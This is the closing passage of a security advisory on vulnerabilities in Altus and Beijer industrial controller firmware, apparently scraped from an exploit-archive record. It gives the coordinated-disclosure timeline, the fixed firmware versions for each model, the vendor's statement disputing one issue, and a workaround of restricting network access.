Security manager told us that he\n can provide information regarding the time-line for the patches\n within the next two weeks.\n2020-12-09: Asked for an update.\n2020-12-18: Call with security manager of Beijer. Vendor presented initial\n analysis done by the affected companies, also Altus. Preliminary\n plans to fix the vulnerabilities were presented. Altus stated it would\n fix issue #1 in January and the other vulnerabilities in March or\n April.\n2021-03-21: Security manager invited SEC Consult to have a status meeting.\n2021-03-25: Altus fixed vulnerability #1. Handover of the advisory handling to\n Altus employees will be done in April. Vendor released fixed\n firmware regarding issue #1.\n2021-04-09: Meeting with Altus. Vendor did not agree with another potential\n vulnerability that was identified on the emulated device. Thus,\n it was removed from the advisory. Vulnerabilities #2 and #3 were\n planned to be fixed earlier this year but the releases shifted due\n to Covid. The new firmware version will be released in July 2021.\n2021-04-22: Asked for an update. No answer.\n2021-05-04: Asked for an update.\n2021-05-07: Vendor was working on the security fixes.\n2021-05-11: Vendor sent timeline for fixes and detailed version information.\n Two additional models were added to the affected devices by the\n vendor.\n2021-06-10: Added additional information and asked if more time will be needed.\n2021-06-10: Vendor added affected version numbers and asked for the 1st of\n August as new release date.\n2021-06-15: Set the release date to 1st of August.\n2021-07-28: Vendor sent the version numbers for the fixed firmware and asked\n for postponing the release to 6th of August for completing the\n documentation.\n2021-08-16: Due to holiday, the SEC Consult Vulnerability Lab was closed. 
Informed\n vendor to release the advisory in the next four days.\n2021-08-17: Received CVE IDs.\n2021-08-18: Informed vendor to release the advisory on 2021-08-19.\n2021-08-19: Coordinated release of security advisory.\n\nSolution:\n---------\nAccording to the vendor the following patches must be applied to fix issues 1),\n2) and 3):\n\nXP300 - v1.11.2.0\nXP315 - v1.11.2.0\nXP325 - v1.11.2.0\nXP340 - v1.11.2.0\nBCS-NX3003 - v1.11.2.0\nBCS-NX3004 - v1.11.2.0\nBCS-NX3005 - v1.11.2.0\nBCS-NX3010 - v1.9.1.0\nBCS-NX3020 - v1.9.1.0\nBCS-NX3030 - v1.9.1.0\nBCS-NX5100 - v1.11.2.0\nBCS-NX5101 - v1.11.2.0\nBCS-NX5110 - v1.11.2.0\nBCS-NX5210 - v1.11.2.0\nBCS-HX3040 - v1.11.2.0\n\nVendor's statement regarding issue 4):\n\"Altus continuously integrates new features and fixes in the products,\nreleasing new firmware versions. Often those improvements require upgrading the\nsoftware packages for several reasons, including security. When this happens,\nwe perform a set of tests to ensure that the performance, reliability, and\nsecurity were not negatively impacted by the upgrades. Although there are known\nvulnerabilities in some software package versions, those vulnerabilities can\nonly be exploited if we compile those specific features and provide the means\nto exploit them. The issue pointed out by SEC Consult, for instance, requires a\nterminal to be exploited, which we don't provide in real hardware. Nowadays,\nthere isn't any known exploitable vulnerability caused by outdated software\npackages in our products. Therefore, this item isn\u2019t considered a vulnerability\nby us.\"\n\n\nWorkaround:\n-----------\nRestrict network access to the device.\n", "sourceHref": "https://0day.today/exploit/36662", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}
